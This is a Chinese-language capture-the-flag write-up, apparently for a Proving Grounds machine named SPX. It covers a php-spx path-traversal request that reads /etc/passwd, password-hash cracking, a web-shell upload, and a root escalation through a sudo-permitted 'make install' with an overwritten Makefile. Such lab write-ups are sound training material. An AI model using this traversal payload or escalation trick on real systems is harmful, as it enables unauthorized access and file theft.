PG_SPX

admin 2025年5月27日20:03:14评论35 views字数 2425阅读8分5秒阅读模式

信息收集:

root@iZt4nbifrvtk7cy11744y4Z:~# nmap -p- -Pn -A -sS -T4 192.168.233.108Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-01 09:20 CSTNmap scan report for 192.168.233.108Host is up (0.0026s latency).Not shown: 65533 filtered portsPORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))|_http-server-header: Apache/2.4.52 (Ubuntu)|_http-title: Tiny File ManagerWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Linux 2.6.32 (91%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Adtran 424RG FTTH gateway (86%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (86%)No exact OS matches for host (test conditions non-ideal).Network Distance: 4 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 80/tcp)HOP RTT     ADDRESS1   1.84 ms 192.168.45.12   1.86 ms 192.168.45.2543   2.13 ms 192.168.251.14   2.38 ms 192.168.233.108OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 99.60 seconds

开放了80的http端口

PG_SPX

尝试两个默认口令均失败,扫描后台

dirsearch -u http://192.168.233.108/ 
PG_SPX

发现了phpinfo页面,查看发现开启了SPX,版本为0.4.15(题目名字是SPX,不然想不到这里

PG_SPX

网上找到一个路径遍历漏洞:https://github.com/NoiseByNorthwest/php-spx/issues/251

发包(需要把SPX_KEY参数换成phpinfo显示的:

GET /index.php?SPX_KEY=a2a90ca2f9f0ea04d267b16fb8e63800&SPX_UI_URI=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1Host: 192.168.233.108User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: keep-aliveCookie: filemanager=dn7e0ttr0ooqm0fjbnn40pt60bUpgrade-Insecure-Requests: 1

成功读取/etc/passwd

PG_SPX

读取index.php文件的时候发现密码被加密了,复制下来存在文件,使用john解密hash

PG_SPX

爆出来一个密码,尝试登录admin用户成功(也就爆了58分钟吧......

PG_SPX

登录后台后上传shell

PG_SPX

收到www-data的shell

PG_SPX

常规信息收集没发现能提权的点(linpeas.sh,lse.sh,pspy32s)

但是用user用户的密码成功切换用户为profiler

PG_SPX

拿到local

PG_SPX

直接sudo执行cat /root/proof.txt失败,sudo -l发现用户可以无密码执行/usr/bin/make install -C /home/profiler/php-spx

PG_SPX

make命令以来目录下面的makefile文件,只需要修改makefile文件后编译

echo -e "install:nt/bin/bash" > /home/profiler/php-spx/Makefilesudo make install -C /home/profiler/php-spx
PG_SPX

原文始发于微信公众号(EuSRC安全实验室):PG_SPX

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月27日20:03:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PG_SPXhttps://cn-sec.com/archives/3952386.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息